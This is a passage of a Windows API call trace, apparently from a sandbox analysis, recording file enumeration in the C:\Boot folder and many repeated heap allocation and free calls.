dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0200.856] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0200.856] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0200.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0200.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0200.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0200.856] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0200.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0200.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0200.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.863] PathFindFileNameW (pszPath="C:\\Boot\\nb-NO\\") returned="nb-NO\\" 